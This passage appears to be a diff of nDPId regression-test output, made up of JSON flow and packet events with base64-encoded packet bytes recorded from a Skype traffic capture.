-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431969716265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OVVAAEAG2mbAqAEiUYUTucPKrY8W93X419BGjIAQECwFxAAAAQEICj4jqlUCsDH1"} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1914,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715511,"flow_last_seen":1431969716485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":3431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1431969716485,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431969714962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714962,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8ec1AAHQGLERRU02NwKgBIkTnw8TZuiW6vWlWIaASIAAuPAAAAgQFrAEDAwgEAggKALqZVz4jpS8="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431969714962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714962,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PRZAAEAGnQPAqAEiUVNNjcPEROe9aVYh2bolu4AQECxsmQAAAQEICj4jpWsAuplX"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715510,"flow_last_seen":1431969715510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715510,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431969715510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715510,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3TdAAEAGS\/3AqAEiR+4Hy8PFSU9+U7C+AAAAALAC\/\/8DrQAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAKktAAEAGjc3AqAEiBfi63cPGeSKEqukYAAAAALAC\/\/8kCwAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAylVAAEAGNVvAqAEiVh8jHsPH6OX+Qs16AAAAALAC\/\/+d5AAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431969715594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969715594,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OFdAAHEGll1WHyMewKgBIujlw8c9omIw\/kLNe6ASIADqygAAAgQFrAEDAwgEAggKABoEJj4jp4I="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431969715594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715594,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XmBAAEAGoVzAqAEiVh8jHsPH6OX+Qs17PaJiMYAQECwpEwAAAQEICj4jp9MAGgQm"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431969715635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715635,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzWBAAHIGuLcF+LrdwKgBInkiw8ZD4gQbhKrpGbASRBB8ngAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431969715635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715635,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wlBAAEAG9dPAqAEiBfi63cPGeSKEqukZQ+IEHIAQECwLJwAAAQEICj4jp\/sAAAAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431969715739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715739,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9cxAAHMGAGhH7gfLwKgBIklPw8W6q5ekflOwv7AS\/\/+V\/QAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431969715739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715739,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iyZAAEAGnhrAqAEiR+4Hy8PFSU9+U7C\/uquXpYAQECzgEQAAAQEICj4jqF8AAAAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716015,"flow_last_seen":1431969716015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716015,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431969716015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716015,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfGpAAEAGXaPAqAEiUVNNjcPJROc2X9vGAAAAALAC\/\/\/T7gAAAgQFtAEDAwUBAQgKPiOpaQAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431969716076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969716076,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8egBAAHQGLBFRU02NwKgBIkTnw8naYr1gNl\/bx6ASIACSowAAAgQFrAEDAwgEAggKALqZxj4jqWk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431969716076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716076,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0B4NAAEAG0pbAqAEiUVNNjcPJROc2X9vH2mK9YYAQECzRAwAAAQEICj4jqaIAupnG"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716182,"flow_last_seen":1431969716182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716182,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431969716182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716182,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3FAAEAG8D7AqAEiUYUTucPKrY8W93X3AAAAALAC\/\/8pggAAAgQFtAEDAwUBAQgKPiOqBgAAAAAEAgAA"} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431969716265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAivNAADAGmLxRhRO5wKgBIq2Pw8rX0EaLFvd1+LAS\/\/\/WdwAAAgQFrAEDAwUBAQgKArAx9T4jqgYEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431969716265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OVVAAEAG2mbAqAEiUYUTucPKrY8W93X419BGjIAQECwFxAAAAQEICj4jqlUCsDH1"} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1914,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715511,"flow_last_seen":1431969716485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":3431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1431969716485,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1431969716797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969716797,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISY\/IAAEARUx\/AqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1431969716797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969716797,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISf8oAAEARdJ\/AqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1431969717061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969717061,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISs5YAAEARA0HAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1431969717062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969717062,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISf4EAAEARdK7AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717177,"flow_last_seen":1431969717177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717177,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431969717177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717177,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+WNAAEAGAQPAqAEiUA4uecPLET9q+lcrAAAAALAC\/\/9zkwAAAgQFtAEDAwUBAQgKPiOtxAAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431969717265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoQ1AAHQGJVlQDi55wKgBIhE\/w8sUK4TLavpXLLAS\/\/\/FfwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431969717265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NNxAAEAGxZbAqAEiUA4uecPLET9q+lcsFCuEzIAQECwJ2AAAAQEICj4jrhsAAAAA"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717295,"flow_last_seen":1431969717295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717295,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431969717295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717295,"pkt":"0NQSxnP1PBXCt3IOCABFAABAu4NAAEAGWCzAqAEiUYUTucPMrY9zRWLSAAAAALAC\/\/\/cJAAAAgQFtAEDAwUBAQgKPiOuOAAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431969717374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717374,"pkt":"PBXCt3IO0NQSxnP1CABFAABAwAFAADAGY65RhRO5wKgBIq2Pw8wuoXfGc0Vi07AS\/\/\/8vwAAAgQFrAEDAwUBAQgKArA2RD4jrjgEAgAA"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} 
